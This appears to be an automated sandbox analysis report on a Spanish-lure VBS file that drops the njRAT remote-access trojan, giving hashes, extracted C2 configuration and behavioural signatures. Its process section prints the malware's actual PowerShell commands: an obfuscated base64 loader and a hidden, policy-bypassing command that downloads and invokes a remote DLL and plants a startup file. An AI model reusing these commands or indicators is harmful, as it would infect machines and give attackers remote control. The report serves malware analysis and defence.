Analysis
-
max time kernel
177s -
max time network
179s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2022, 20:10
Static task
static1
Behavioral task
behavioral1
Sample
0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
Resource
win7-20220812-en
General
-
Target
0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
-
Size
201KB
-
MD5
7630029622a80a4a6563200a053ac39c
-
SHA1
54bbc37e0fd0dfe0d23874c295e59fa303aac7ff
-
SHA256
7310fb74edb1596430ef2e68fd3d339df540ae79e78d74895697ac81a1533204
-
SHA512
03b8fde8a8d3264ae78567be466dd630951913b0ccf60c7f5430b34061e9c521350d9ed75d8984487f2f74d582365e8de89867924ab609b57ae31e0ddeb84d37
-
SSDEEP
96:dyYRYFYDnYHFLvTfJZf4UbbNhtF/Zldy2ILS8414NEWUvWZ1+AN1qHk:d9ua6Ay/ATm45ZJ1qE
Malware Config
Extracted
https://tinyurl.com/2erph6cs
Extracted
njrat
0.7NC
NYAN CAT
nyas22.duckdns.org:57831
8521e1f80fc24
-
reg_key
8521e1f80fc24
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 25 2132 powershell.exe 30 2132 powershell.exe 34 2132 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$%&\567R$%RTuy#dtyhtyf5667.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2132 set thread context of 852 2132 powershell.exe 88 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 32 powershell.exe 32 powershell.exe 2132 powershell.exe 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 32 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe Token: 33 852 InstallUtil.exe Token: SeIncBasePriorityPrivilege 852 InstallUtil.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4468 wrote to memory of 32 4468 WScript.exe 85 PID 4468 wrote to memory of 32 4468 WScript.exe 85 PID 32 wrote to memory of 2132 32 powershell.exe 87 PID 32 wrote to memory of 2132 32 powershell.exe 87 PID 2132 wrote to memory of 852 2132 powershell.exe 88 PID 2132 wrote to memory of 852 2132 powershell.exe 88 PID 2132 wrote to memory of 852 2132 powershell.exe 88 PID 2132 wrote to memory of 852 2132 powershell.exe 88 PID 2132 wrote to memory of 852 2132 powershell.exe 88 PID 2132 wrote to memory of 852 2132 powershell.exe 88 PID 2132 wrote to memory of 852 2132 powershell.exe 88 PID 2132 wrote to memory of 852 2132 powershell.exe 88
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIBQgFCCvAK8AFCCvABMgEyCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADIAWABaAC8AcwByAG⌚⌚⌚AZgBvAG0ALwB3AG⌚⌚⌚AbgAvADQANwAuADAANQAuADMAMQAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACQAJQAmAC8ANQA2ADcA⌚⌚⌚gAkAC⌚⌚⌚A⌚⌚⌚gB⌚⌚⌚AH⌚⌚⌚AeQAiACMAZAB0AHkAaAB0AHkAZgA1ADYANgA3ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.2XZ/srefom/wen/47.05.312.19//:ptth' , $RodaCopy , '$%&/567R$%RTuy"#dtyhtyf5667' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0